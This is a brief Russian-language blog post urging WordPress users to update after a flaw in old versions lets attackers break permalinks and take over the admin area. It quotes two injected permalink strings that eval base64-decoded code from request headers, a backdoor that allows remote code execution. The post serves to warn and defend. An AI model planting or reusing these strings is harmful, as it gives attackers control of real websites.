Очередная маст рид заметка о безопасности WordPress. Среди читателей и просто блоггеров есть многие, кто еще пользуется старой версией движка. А я вам говорю всегда – обновляться нужно! Как просто обновить WordPress я уже рассказывал, проблем (практически) не бывает в 99% случаев.
Новая уязвимость в старых! версиях позволяет изувечить весь ваш блог. Методом MySQL-инъекции, можно поломать ЧПУ, сделав их совсем не рабочими, а еще злоумышленник получает доступ к администрированию блога!.
Атакованные блоги подвергаются хаку, который добавляет к пермалинку:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Те, кто понял, что угроза не шуточная, прочитайте вот эти два материала. Первый о том, что происходит, а второй – как защититься от проблемы. Не забывайте обновляться до последней версии!
- По теме подробнее у Дмитрия Донченко – http://blogproblog.com
- И лечение этого хака на Inforedesign.com (первоисточник)